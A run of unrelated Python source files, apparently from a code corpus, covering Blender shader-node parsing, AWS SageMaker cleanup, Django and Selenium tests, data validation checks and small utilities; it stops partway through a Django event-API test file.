bright = c.parse_value_input(node.inputs[1]) contr = c.parse_value_input(node.inputs[2]) state.curshader.add_function(c_functions.str_brightcontrast) return 'brightcontrast({0}, {1}, {2})'.format(out_col, bright, contr) def parse_gamma(node: bpy.types.ShaderNodeGamma, out_socket: bpy.types.NodeSocket, state: ParserState) -> vec3str: out_col = c.parse_vector_input(node.inputs[0]) gamma = c.parse_value_input(node.inputs[1]) return 'pow({0}, vec3({1}))'.format(out_col, gamma) def parse_huesat(node: bpy.types.ShaderNodeHueSaturation, out_socket: bpy.types.NodeSocket, state: ParserState) -> vec3str: state.curshader.add_function(c_functions.str_hue_sat) hue = c.parse_value_input(node.inputs[0]) sat = c.parse_value_input(node.inputs[1]) val = c.parse_value_input(node.inputs[2]) fac = c.parse_value_input(node.inputs[3]) col = c.parse_vector_input(node.inputs[4]) return f'hue_sat({col}, vec4({hue}-0.5, {sat}, {val}, 1.0-{fac}))' def parse_invert(node: bpy.types.ShaderNodeInvert, out_socket: bpy.types.NodeSocket, state: 
ParserState) -> vec3str: fac = c.parse_value_input(node.inputs[0]) out_col = c.parse_vector_input(node.inputs[1]) return f'mix({out_col}, vec3(1.0) - ({out_col}), {fac})' def parse_mixrgb(node: bpy.types.ShaderNodeMixRGB, out_socket: bpy.types.NodeSocket, state: ParserState) -> vec3str: col1 = c.parse_vector_input(node.inputs[1]) col2 = c.parse_vector_input(node.inputs[2]) # Store factor in variable for linked factor input if node.inputs[0].is_linked: fac = c.node_name(node.name) + '_fac' state.curshader.write('float {0} = {1};'.format(fac, c.parse_value_input(node.inputs[0]))) else: fac = c.parse_value_input(node.inputs[0]) # TODO: Do not mix if factor is constant 0.0 or 1.0? blend = node.blend_type if blend == 'MIX': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) elif blend == 'ADD': out_col = 'mix({0}, {0} + {1}, {2})'.format(col1, col2, fac) elif blend == 'MULTIPLY': out_col = 'mix({0}, {0} * {1}, {2})'.format(col1, col2, fac) elif blend == 'SUBTRACT': out_col = 'mix({0}, {0} - {1}, {2})'.format(col1, col2, fac) elif blend == 'SCREEN': out_col = '(vec3(1.0) - (vec3(1.0 - {2}) + {2} * (vec3(1.0) - {1})) * (vec3(1.0) - {0}))'.format(col1, col2, fac) elif blend == 'DIVIDE': out_col = '(vec3((1.0 - {2}) * {0} + {2} * {0} / {1}))'.format(col1, col2, fac) elif blend == 'DIFFERENCE': out_col = 'mix({0}, abs({0} - {1}), {2})'.format(col1, col2, fac) elif blend == 'DARKEN': out_col = 'min({0}, {1} * {2})'.format(col1, col2, fac) elif blend == 'LIGHTEN': out_col = 'max({0}, {1} * {2})'.format(col1, col2, fac) elif blend == 'OVERLAY': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'DODGE': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'BURN': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'HUE': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'SATURATION': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'VALUE': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'COLOR': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix elif blend == 'SOFT_LIGHT': out_col = '((1.0 - {2}) * {0} + {2} * ((vec3(1.0) - {0}) * {1} * {0} + {0} * (vec3(1.0) - (vec3(1.0) - {1}) * (vec3(1.0) - {0}))));'.format(col1, col2, fac) elif blend == 'LINEAR_LIGHT': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac) # Revert to mix # out_col = '({0} + {2} * (2.0 * ({1} - vec3(0.5))))'.format(col1, col2, fac_var) else: log.warn(f'MixRGB node: unsupported blend type {node.blend_type}.') return col1 if node.use_clamp: return 'clamp({0}, vec3(0.0), vec3(1.0))'.format(out_col) return out_col def parse_curvergb(node: bpy.types.ShaderNodeRGBCurve, out_socket: bpy.types.NodeSocket, state: ParserState) -> vec3str: fac = c.parse_value_input(node.inputs[0]) vec = c.parse_vector_input(node.inputs[1]) curves = node.mapping.curves name = c.node_name(node.name) # mapping.curves[0].points[0].handle_type return '(sqrt(vec3({0}, {1}, {2}) * vec3({4}, {5}, {6})) * {3})'.format( c.vector_curve(name + '0', vec + '.x', curves[0].points), c.vector_curve(name + '1', vec + '.y', curves[1].points), c.vector_curve(name + '2', vec + '.z', curves[2].points), fac, c.vector_curve(name + '3a', vec + '.x', curves[3].points), c.vector_curve(name + '3b', vec + '.y', curves[3].points), c.vector_curve(name + '3c', vec + '.z', curves[3].points)) def parse_lightfalloff(node: bpy.types.ShaderNodeLightFalloff, 
out_socket: bpy.types.NodeSocket, state: ParserState) -> floatstr: # https://github.com/blender/blender/blob/master/source/blender/gpu/shaders/material/gpu_shader_material_light_falloff.glsl return c.parse_value_input(node.inputs['Strength']) import numpy as np, random class Adversary: def __init__(self, w_star, X, model = "logistic", log_bias = None): self.w_star_ = w_star self.log_bias_ = log_bias self.a_star_reward = np.amax(self.log_bias_) self.best_arm = np.argmax(self.log_bias_) # multinomial # self.best_arm, self.a_star_reward = self.get_best_real_reward_multi() def get_adversary_reward(self, X): l = len(self.w_star_[X]) l2 = len(self.w_star_[self.best_arm]) idx = random.randint(0, l - 1) idx2 = random.randint(0, l2 - 1) rew = self.w_star_[X][idx] idx = np.unique(np.random.randint(100, size=1)) # idx2 = np.unique(np.random.randint(100, size=10)) # print self.w_star_[X], type(self.w_star_[X]) # print self.w_star_[X][idx] # rew = np.sum(self.w_star_[X][idx]) # print rew # reg = self.log_bias_[X] br = self.log_bias_[self.best_arm] rew = self.log_bias_[X] reg = br - rew # For multinomial # reg = self.a_star_reward - self.get_real_reward_multi(X) return rew, reg def get_best_real_reward_multi(self): best = 0 br = 0.0 for i in range(32): cr = self.get_real_reward_multi(i) if cr > br: best = i br = cr return best, br def get_real_reward_multi(self, i): cr = 0.0 for j in range(7): cr += (j + 1) * self.log_bias_[i][j] return cr PyUnchained/books # Generated by Django 2.2.6 on 2020-01-27 04:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('books', '0013_auto_20200124_0732'), ] operations = [ migrations.AddField( model_name='doubleentry', name='related_document', field=models.FileField(blank=True, null=True, upload_to='double_entry_files'), ), ] jbnunn/sagemaker-battlesnake-ai0 #!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://www.apache.org/licenses/LICENSE-2.0 # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. 
import json import os import boto3 import requests from botocore.exceptions import ClientError def handler(event, context): try: operation = event['ResourceProperties']['Operation'] if operation == 'CleanupSagemakerBucket': if event['RequestType'] == 'Delete': bucketName = os.environ['SAGEMAKER_BUCKET_NAME'] s3 = boto3.resource('s3') try: bucket = s3.Bucket(bucketName) bucket.objects.filter(Prefix='battlesnake-aws/').delete() bucket.objects.filter(Prefix='battlesnake-mxnet/').delete() except ClientError as e: print('Bucket did not exist, skipping') print(e.response['Error']) elif operation == 'CleanupSagemakerEndpoint': if event['RequestType'] == 'Delete': deployment_name = 'battlesnake-endpoint' client = boto3.client('sagemaker') try: response = client.describe_endpoint_config(EndpointConfigName=deployment_name) model_name = response['ProductionVariants'][0]['ModelName'] client.delete_model(ModelName=model_name) client.delete_endpoint(EndpointName=deployment_name) client.delete_endpoint_config(EndpointConfigName=deployment_name) except ClientError as e: print('Endpoint did not exist, skipping') print(e.response['Error']) sendResponseCfn(event, context, "SUCCESS") except Exception as e: print(e) sendResponseCfn(event, context, "FAILED") def sendResponseCfn(event, context, responseStatus): response_body = {'Status': responseStatus, 'Reason': 'Log stream name: ' + context.log_stream_name, 'PhysicalResourceId': context.log_stream_name, 'StackId': event['StackId'], 'RequestId': event['RequestId'], 'LogicalResourceId': event['LogicalResourceId'], 'Data': json.loads("{}")} requests.put(event['ResponseURL'], data=json.dumps(response_body)) # Mapping between str and num class Solution: def multiply(self, num1, num2): numlookUp = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9} strlookUp = {0: '0', 1: '1', 2: '2', 3: '3', 4: '4', 5: '5', 6: '6', 7: '7', 8: '8', 9: '9'} if num1 == '0' or num2 == '0': return '0' num1 = num1[::-1] num2 = num2[::-1] tmpRes = [0 for i in range(len(num1) + len(num2))] for i in range(len(num1)): for j in range(len(num2)): tmpRes[i + j] += numlookUp[num1[i]] * numlookUp[num2[j]] res = [0 for i in range(len(num1) + len(num2))] for i in range(len(num1) + len(num2)): res[i] = tmpRes[i] % 10 if i < len(num1) + len(num2) - 1: tmpRes[i + 1] += tmpRes[i] // 10 return ''.join(strlookUp[i] for i in res[::-1]).lstrip('0') if __name__ == "__main__": s = Solution() num1 = '100' num2 = '100' print(s.multiply(num1, num2))fudgemsg/tests/test_maptaxonomyresolver.py # # Copyright CERN, 2010. # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. 
# import unittest from fudgemsg.taxonomy.mapresolver import * from fudgemsg.taxonomy.map import Taxonomy class TestMapTaxomomy(unittest.TestCase): def test_no_resolver(self): tr = TaxonomyResolver() self.assertEquals(0, len(tr)) self.assertEquals(None, tr.resolve_taxonomy(1)) def test_simple_resolver(self): t1 = Taxonomy({1: u'foo', 2: u'bar'}) t2 = Taxonomy({3: u'foo', 4: u'bar'}) tr = TaxonomyResolver({1 : t1, 255: t2}) self.assertEquals(t1, tr.resolve_taxonomy(1)) self.assertEquals(t2, tr.resolve_taxonomy(255)) self.assertEquals(2, len(tr))tests/test_modify.py import time from selenium import webdriver from webdriver_manager.chrome import ChromeDriverManager from selenium.webdriver.chrome.options import Options from selenium.webdriver.common.by import By import random import string options = Options() options.headless = True driver = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options) # test modify function def test_modify(): url = "http://localhost:1667/#/" driver.get(url) time.sleep(2) '''prerequisites: - existing test user login - create new article to modify''' user_name = "testuser1" user_email = (user_name + "@example.") password = "$" driver.find_element(By.XPATH, '//a[@href="#/login"]').click() driver.find_element(By.XPATH, '//*[@type="text"]').send_keys(user_email) driver.find_element(By.XPATH, '//*[@type="password"]').send_keys(password) driver.find_element(By.TAG_NAME, "button").click() time.sleep(2) random_text = "".join([random.choice(string.ascii_lowercase) for _ in range(10)]) time.sleep(1) driver.find_element(By.XPATH, '//a[@href="#/editor"]').click() time.sleep(1) article_title = driver.find_element(By.XPATH, '//input[@placeholder="Article Title"]') article_title.send_keys(random_text) submit_btn = driver.find_element(By.XPATH, '//button[@type="submit"]') submit_btn.click() time.sleep(1) displayed_text = driver.find_element(By.XPATH, '//div[@class="container"]/h1').text assert displayed_text == random_text time.sleep(1) # modify article edit_btn = driver.find_element(By.XPATH, '//a[@class="btn btn-sm btn-outline-secondary"]') edit_btn.click() time.sleep(1) article_title = driver.find_element(By.XPATH, '//input[@placeholder="Article Title"]') article_title.clear() time.sleep(1) article_title.send_keys(random_text) submit_btn.click() time.sleep(1) # check modification displayed_text = driver.find_element(By.XPATH, '//div[@class="container"]/h1').text assert displayed_text == random_text # logout driver.find_element(By.XPATH, '//a[@active-class="active"]').click() driver.close() driver.quit() AutomatedTesting/Gem/PythonTests/largeworlds/gradient_signal/EditorScripts/ImageGradient_ProcessedImageAssignedSuccessfully.py1-10 """ Copyright (c) Contributors to the Open 3D Engine Project. For complete copyright and license terms please see the LICENSE at the root of this distribution. 
SPDX-License-Identifier: Apache-2.0 OR MIT """ import os import sys sys.path.append(os.path.dirname(os.path.abspath(__file__))) import azlmbr.asset as asset import azlmbr.bus as bus import azlmbr.entity as EntityId import azlmbr.editor as editor import azlmbr.math as math import azlmbr.paths sys.path.append(os.path.join(azlmbr.paths.devroot, 'AutomatedTesting', 'Gem', 'PythonTests')) import editor_python_test_tools.hydra_editor_utils as hydra from editor_python_test_tools.editor_test_helper import EditorTestHelper class TestImageGradient(EditorTestHelper): def __init__(self): EditorTestHelper.__init__(self, log_prefix="ImageGradient_ProcessedImageAssignedSucessfully", args=["level"]) def run_test(self): """ Summary: Level created with Entity having Image Gradient and Gradient Transform Modifier components. Save any new image to your workspace with the suffix "_gsi" and assign as image asset. Expected Behavior: Image can be assigned as the Image Asset for the Image as Gradient component. Test Steps: 1) Create level 2) Create an entity with Image Gradient and Gradient Transform Modifier components. 3) Assign the newly processed gradient image as Image asset. Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ # 1) Create level self.test_success = self.create_level( self.args["level"], heightmap_resolution=1024, heightmap_meters_per_pixel=1, terrain_texture_resolution=4096, use_terrain=False, ) # 2) Create an entity with Image Gradient and Gradient Transform Modifier components components_to_add = ["Image Gradient", "Gradient Transform Modifier", "Box Shape"] entity_position = math.Vector3(512.0, 512.0, 32.0) new_entity_id = editor.ToolsApplicationRequestBus( bus.Broadcast, "CreateNewEntityAtPosition", entity_position, EntityId.EntityId() ) if new_entity_id.IsValid(): print("Image Gradient Entity created") image_gradient_entity = hydra.Entity("Image Gradient Entity", new_entity_id) image_gradient_entity.components = [] for component in components_to_add: image_gradient_entity.add_component(component) # 3) Assign the processed gradient signal image as the Image Gradient's image asset and verify success # First, check for the base image in the workspace base_image = "image_grad_test_gsi.png" base_image_path = os.path.join("AutomatedTesting", "Assets", "ImageGradients", base_image) if os.path.isfile(base_image_path): print(f"{base_image} was found in the workspace") # Next, assign the processed image to the Image Gradient's Image Asset property processed_image_path = os.path.join("Assets", "ImageGradients", "image_grad_test_gsi.gradimage") asset_id = asset.AssetCatalogRequestBus(bus.Broadcast, "GetAssetIdByPath", processed_image_path, math.Uuid(), False) hydra.get_set_test(image_gradient_entity, 0, "Configuration|Image Asset", asset_id) # Finally, verify if the gradient image is assigned as the Image Asset success = hydra.get_component_property_value(image_gradient_entity.components[0], "Configuration|Image Asset") == asset_id self.test_success = self.test_success and success test = TestImageGradient() test.run() #!/usr/bin/env python from amusement.parks.disney.DisneyPark import DisneyPark class AnimalKingdom(DisneyPark): def __init__(self): super(AnimalKingdom, self).__init__() def getId(self): return '80007823' def getName(self): return "Disney's Animal Kingdom" from cffi import FFI ffibuilder 
= FFI() ffibuilder.set_source( "_fastx", r""" #include #include #include "kseq.h" KSEQ_INIT(gzFile, gzread) kseq_t *open_fastx (const char *fn) { gzFile fp = gzopen(fn, "r"); return kseq_init(fp); } void close_fastx(kseq_t *kseq) { gzclose(kseq->f->f); kseq_destroy(kseq); } """, libraries=['z'], include_dirs=['src'] ) ffibuilder.cdef( r""" typedef struct kstring_t { size_t l, m; char *s; } kstring_t; typedef struct kseq_t { kstring_t name, comment, seq, qual; ...; } kseq_t; kseq_t *open_fastx(const char *fn); void close_fastx(kseq_t *kseq); int kseq_read(kseq_t *kseq); """ ) ffibuilder.compile(verbose=True) augusto-herrmann/frictionless-py from frictionless import validate, checks # Duplicate Row def test_validate_duplicate_row(): report = validate("data/duplicate-rows.csv", checks=[checks.duplicate_row()]) assert report.flatten(["rowPosition", "fieldPosition", "code"]) == [ [4, None, "duplicate-row"], ] def test_validate_duplicate_row_valid(): report = validate("data/table.csv", checks=[{"code": "duplicate-row"}]) assert report.flatten(["rowPosition", "fieldPosition", "code"]) == [] # Deviated Value def test_validate_deviated_value(): source = [["temperature"], [1], [-2], [7], [0], [1], [2], [5], [-4], [100], [8], [3]] report = validate( source, checks=[ checks.deviated_value( field_name="temperature", average="median", interval=3, ) ], ) assert report.flatten(["code", "note"]) == [ [ "deviated-value", 'value "100" in row at position "10" and field "temperature" is deviated "[-87.21, 91.21]"', ], ] def test_value_deviated_value_not_enough_data(): source = [ ["temperature"], [1], ] report = validate( source, checks=[{"code": "deviated-value", "fieldName": "temperature"}], ) assert report.flatten(["code", "note"]) == [] def test_validate_deviated_value_not_a_number(): source = [ ["row", "name"], [2, "Alex"], ] report = validate(source, checks=[{"code": "deviated-value", "fieldName": "name"}]) assert report.flatten(["code", "note"]) == [ ["check-error", 'deviated value check requires field "name" to be numiric'], ] def test_validate_deviated_value_non_existent_field(): source = [ ["row", "name"], [2, "Alex"], ] report = validate( source, checks=[{"code": "deviated-value", "fieldName": "bad"}], ) assert report.flatten(["code", "note"]) == [ ["check-error", 'deviated value check requires field "bad" to exist'], ] def test_validate_deviated_value_incorrect_average(): source = [ ["row", "name"], [2, "Alex"], ] report = validate( source, checks=[{"code": "deviated-value", "fieldName": "row", "average": "bad"}], ) assert report.flatten(["code", "note"]) == [ [ "check-error", 'deviated value check supports only average functions "mean, median, mode"', ], ] # Truncated value def test_validate_truncated_values(): source = [ ["int", "str"], ["a" * 255, 32767], ["good", 2147483647], ] report = validate(source, checks=[checks.truncated_value()]) assert report.flatten(["rowPosition", "fieldPosition", "code"]) == [ [2, 1, "truncated-value"], [2, 2, "truncated-value"], [3, 2, "truncated-value"], ] def test_validate_truncated_values_close_to_errors(): source = [ ["int", "str"], ["a" * 254, 32766], ["good", 2147483646], ] report = validate(source, checks=[{"code": "truncated-value"}]) assert report.flatten(["rowPosition", "fieldPosition", "code"]) == [] thinkmoore/das # This software was developed at the National Institute of Standards # and Technology in whole or in part by employees of the Federal # Government in the course of their official duties. 
Pursuant to # title 17 Section 105 of the United States Code portions of this # software authored by NIST employees are not subject to copyright # protection and are in the public domain. For portions not authored # by NIST employees, NIST has been granted unlimited rights. NIST # assumes no responsibility whatsoever for its use by other parties, # and makes no guarantees, expressed or implied, about its quality, # reliability, or any other characteristic. # # We would appreciate acknowledgement if the software is used. __version__="0.1.0" import sys import logging import os sys.path.append( os.path.join(os.path.dirname(__file__), "../..")) import dfxml import dfxml.objects as Objects def test_all(): logging.basicConfig(level=logging.DEBUG) _logger = logging.getLogger(os.path.basename(__file__)) v0 = Objects.VolumeObject() v0.sector_size = 512 v0.block_size = 4096 v0.partition_offset = 32256 v0.ftype = -1 assert v0.ftype == -1 v0.ftype_str = 1 v0.block_count = 100000 v0.allocated_only = False v0.first_block = 0 v0.last_block = v0.block_count _logger.debug(repr(v0)) v1 = eval("Objects." + repr(v0)) e0 = v0.to_Element() _logger.debug("e0 = %r" % e0) v2 = Objects.VolumeObject() v2.populate_from_Element(e0) v1.block_size = 512 v2.partition_offset = v0.partition_offset + v0.block_count*v0.block_size d01 = v0.compare_to_other(v1) d02 = v0.compare_to_other(v2) _logger.debug("d01 = %r" % d01) assert d01 == set(["block_size"]) _logger.debug("d02 = %r" % d02) assert d02 == set(["partition_offset"]) import AnimatedProp from direct.actor import Actor from direct.interval.IntervalGlobal import * class HQPeriscopeAnimatedProp(AnimatedProp.AnimatedProp): def __init__(self, node): AnimatedProp.AnimatedProp.__init__(self, node) parent = node.getParent() self.periscope = Actor.Actor(node, copy=0) self.periscope.reparentTo(parent) self.periscope.loadAnims({'anim': 'phase_3.5/models/props/HQ_periscope-chan'}) self.periscope.pose('anim', 0) self.node = self.periscope self.track = Sequence(Wait(2.0), self.periscope.actorInterval('anim', startFrame=0, endFrame=40), Wait(0.7), self.periscope.actorInterval('anim', startFrame=40, endFrame=90), Wait(0.7), self.periscope.actorInterval('anim', startFrame=91, endFrame=121), Wait(0.7), self.periscope.actorInterval('anim', startFrame=121, endFrame=91), Wait(0.7), self.periscope.actorInterval('anim', startFrame=90, endFrame=40), Wait(0.7), self.periscope.actorInterval('anim', startFrame=40, endFrame=90), Wait(0.7), self.periscope.actorInterval('anim', startFrame=91, endFrame=121), Wait(0.5), self.periscope.actorInterval('anim', startFrame=121, endFrame=148), Wait(3.0), name=self.uniqueName('HQPeriscope')) def delete(self): AnimatedProp.AnimatedProp.delete(self) self.node.cleanup() del self.node del self.periscope del self.track def enter(self): AnimatedProp.AnimatedProp.enter(self) self.track.loop() def exit(self): AnimatedProp.AnimatedProp.exit(self) self.track.finish() apps/phonebook/tests/test_modelform.py from funfactory.urlresolvers import reverse from nose.tools import eq_ from pyquery import PyQuery as pq from apps.common.tests import ESTestCase, user class ModelForms(ESTestCase): def test_edit_unavailable_form_field(self): newbie_client = self.pending_client newbie = self.pending # make sure we're at a good starting state assert not newbie.get_profile().is_vouched edit_profile_url = reverse('profile.edit') bad_data = dict(full_name='BadLaRue', bio='Rides the rails', is_vouched=True) bad_edit = newbie_client.post(edit_profile_url, bad_data, follow=True) 
eq_(bad_edit.status_code, 200) newbie_profile = bad_edit.context['profile'] assert not newbie_profile.is_vouched eq_(newbie_profile.full_name, bad_data['full_name']) def test_username_filled_in(self): """The username field should have a type and value.""" newbie = user(username='sam', email='') url = reverse('profile.edit') assert self.client.login(email=newbie.email) response = self.client.get(url, follow=True) eq_(200, response.status_code) doc = pq(response.content) field = doc('#id_username')[0] eq_('input', field.tag) assert 'value' in field.attrib eq_('text', field.attrib['type']) eq_(newbie.username, field.attrib['value']) import unittest from sql4json.sql_statement import SQLStatement from sql4json.exceptions import SQLStatementFormatException class SQLStatementTests(unittest.TestCase): def test_parse_empty_statement(self): try: sql_statement = SQLStatement('') self.fail() except SQLStatementFormatException: pass def test_select(self): sql_statement = SQLStatement("select *") self.assertEqual("*", sql_statement.get_select_section()) self.assertEqual(None, sql_statement.get_from_section()) self.assertEqual(None, sql_statement.get_where_section()) self.assertEqual(None, sql_statement.get_limit_section()) def test_select_from(self): sql_statement = SQLStatement("select * from some/path") self.assertEqual("*", sql_statement.get_select_section()) self.assertEqual("some/path", sql_statement.get_from_section()) self.assertEqual(None, sql_statement.get_where_section()) self.assertEqual(None, sql_statement.get_limit_section()) def test_from_where(self): sql_statement = SQLStatement("SELECT id, key3 FROM somewhere WHERE key1==1 or (key2 == 'string value'&&key3>4") self.assertEqual("id, key3", sql_statement.get_select_section()) self.assertEqual("somewhere", sql_statement.get_from_section()) self.assertEqual("key1==1 or (key2 == 'string value'&&key3>4", sql_statement.get_where_section()) self.assertEqual(None, sql_statement.get_limit_section()) def test_from_where_limit(self): sql_statement = SQLStatement( "SELECT id, key3 FROM somewhere WHERE key1==1 or (key2 == 'string value'&&key3>4 LIMIT 5") self.assertEqual("id, key3", sql_statement.get_select_section()) self.assertEqual("somewhere", sql_statement.get_from_section()) self.assertEqual("key1==1 or (key2 == 'string value'&&key3>4", sql_statement.get_where_section()) self.assertEqual("5", sql_statement.get_limit_section()) def test_sql_statements_not_starting_with_a_section_name_throw_an_exception(self): try: sql_statement = SQLStatement("WORST sql statement.... EVER.") self.fail() except SQLStatementFormatException: passtests/commands/test_latest.py def test_latest(): print('\n >>> start Latest Features... 
\n') import talos from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense x, y = talos.templates.datasets.iris() p = {'activation': ['relu', 'elu'], 'optimizer': ['Nadam', 'Adam'], 'losses': ['logcosh'], 'shapes': ['brick'], 'first_neuron': [16, 32, 64, 128], 'hidden_layers': [0, 1, 2, 3], 'dropout': [.2, .3, .4], 'batch_size': [20, 30, 40, 50], 'epochs': [10]} def iris_model(x_train, y_train, x_val, y_val, params): model = Sequential() model.add(Dense(params['first_neuron'], input_dim=4, activation=params['activation'])) talos.utils.hidden_layers(model, params, 3) model.add(Dense(3, activation='softmax')) model.compile(optimizer=params['optimizer'], loss=params['losses'], metrics=['acc']) out = model.fit(x_train, y_train, callbacks=[talos.utils.ExperimentLogCallback('test_latest', params)], batch_size=params['batch_size'], epochs=params['epochs'], validation_data=(x_val, y_val), verbose=0) return out, model scan_object = talos.Scan(x, y, model=iris_model, params=p, experiment_name='test_latest', round_limit=5, reduction_method='gamify', save_weights=False) print('finised Latest Features \n') from setuptools import setup, find_packages def get_version_and_cmdclass(package_path): """Load version.py module without importing the whole package. Template code from miniver """ import os from importlib.util import module_from_spec, spec_from_file_location spec = spec_from_file_location( "version", os.path.join(package_path, "_clean_version.py") ) module = module_from_spec(spec) spec.loader.exec_module(module) return module.__version__, module.cmdclass version, cmdclass = get_version_and_cmdclass("e2elink") with open("README.md", "r", encoding="utf8") as fh: long_description = fh.read() with open("requirements.txt") as f: install_requires = f.read().splitlines() with open("requirements_extra.txt") as f: install_requires_extra = f.read().splitlines() extras_require = {"dev": install_requires_extra} setup( name="e2elink", version=version, cmdclass=cmdclass, author=", ", author_email=", ", url="https://github.com/ersilia-os/e2elink", description="End-to-end record linkage aided by machine learning", long_description=long_description, long_description_content_type="text/markdown", license="MIT", python_requires=">=3.7", install_requires=install_requires, extras_require=extras_require, packages=find_packages(exclude=("utilities")), entry_points={"console_scripts": ["e2elink=e2elink.cli:cli"]}, classifiers=( "Programming Language :: Python :: 3.7", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Topic :: Scientific/Engineering :: Artificial Intelligence", ), keywords="record-linkage machine-learning medical-informatics", project_urls={ "Source Code": "https://github.com/ersilia-os/e2elink/", }, include_package_data=True, package_data={"": ["example/files/*.csv"]}, ) #!/usr/bin/env python3 n = int(input()) for a in range(1, 40): for b in range(1, 30): if 3 ** a + 5 ** b == n: print(a, b) exit() print(-1)from gan_training.models import ( resnet, resnet2, resnet3, dvae ) dvae_dict = { 'BetaVAE_H': dvae.BetaVAE_H, } generator_dict = { 'resnet': resnet.Generator, 'resnet2': resnet2.Generator, 'resnet3': resnet3.Generator, 'dvae_dec': dvae.Generator, } discriminator_dict = { 'resnet': resnet.Discriminator, 'resnet2': resnet2.Discriminator, 'resnet3': resnet3.Discriminator, 'dvae_enc': dvae.Discriminator, } from typing import Tuple import pandas as pd from sklearn.model_selection import train_test_split from src.utils.read_params import 
read_params def custom_train_test_split(file_path: str, test_size: float, split_seed: int) -> Tuple[pd.DataFrame, pd.DataFrame]: """Splitting data into train and test sets. Parameters ---------- file_path : str Dataset path. test_size : float Proportion of the dataset to include in the train split. split_seed : int Seed for reproducible splitting. Returns ------- train : pd.DataFrame Train set. test : pd.DataFrame Test set. """ df = pd.read_csv(file_path) train, test = train_test_split(df, test_size=test_size, random_state=split_seed) return train, test if __name__ == '__main__': params = read_params() train_df, test_df = custom_train_test_split( params['file_path'], params['test_size'], params['split_seed'] ) train_df.to_csv("data/processed/train.csv", index=False) test_df.to_csv("data/processed/test.csv", index=False) events/tests/test_event_post.py # -*- coding: utf-8 -*- from datetime import timedelta import pytest from django.utils import timezone, translation from django.utils.encoding import force_text from .utils import versioned_reverse as reverse from events.tests.utils import assert_event_data_is_equal from .conftest import DATETIME from events.models import Event from django.conf import settings @pytest.fixture def list_url(): return reverse('event-list') # === util methods === def create_with_post(api_client, event_data, data_source=None): create_url = reverse('event-list') if data_source: api_client.credentials(apikey=data_source.api_key) # save with post response = api_client.post(create_url, event_data, format='json') assert response.status_code == 201, str(response.content) # double-check with get resp2 = api_client.get(response.data['@id']) assert resp2.status_code == 200, str(response.content) return resp2 # === tests === @pytest.mark.django_db def test__create_a_minimal_event_with_post(api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) response = create_with_post(api_client, minimal_event_dict) assert_event_data_is_equal(minimal_event_dict, response.data) @pytest.mark.django_db def test__cannot_create_an_event_with_existing_id(api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) minimal_event_dict['id'] = settings.SYSTEM_DATA_SOURCE_ID + ':1' response = create_with_post(api_client, minimal_event_dict) response2 = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response2.status_code == 400 @pytest.mark.django_db def test__a_non_user_cannot_create_an_event(api_client, minimal_event_dict): response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == 401 @pytest.mark.django_db def test__a_non_admin_cannot_create_an_event(api_client, minimal_event_dict, user): user.get_default_organization().admin_users.remove(user) api_client.force_authenticate(user) response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == 403 @pytest.mark.django_db def test__api_key_with_organization_can_create_an_event(api_client, minimal_event_dict, data_source, organization): data_source.owner = organization data_source.save() response = create_with_post(api_client, minimal_event_dict, data_source) assert_event_data_is_equal(minimal_event_dict, response.data) @pytest.mark.django_db def test__api_key_without_organization_cannot_create_an_event(api_client, minimal_event_dict, data_source): api_client.credentials(apikey=data_source.api_key) response = api_client.post(reverse('event-list'), 
minimal_event_dict, format='json') assert response.status_code == 403 @pytest.mark.django_db def test__unknown_api_key_cannot_create_an_event(api_client, minimal_event_dict): api_client.credentials(apikey='unknown') response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == 401 @pytest.mark.django_db def test__empty_api_key_cannot_create_an_event(api_client, minimal_event_dict): api_client.credentials(apikey='') response = api_client.post(reverse('event-list'), minimal_event_dict, format='json') assert response.status_code == 401 @pytest.mark.django_db def test__cannot_create_an_event_ending_before_start_time(list_url, api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) minimal_event_dict['end_time'] = (timezone.now() + timedelta(days=1)).isoformat() minimal_event_dict['start_time'] = (timezone.now() + timedelta(days=2)).isoformat() response = api_client.post(list_url, minimal_event_dict, format='json') assert response.status_code == 400 assert 'end_time' in response.data @pytest.mark.django_db def test__create_a_draft_event_without_location_and_keyword(list_url, api_client, minimal_event_dict, user): api_client.force_authenticate(user=user) 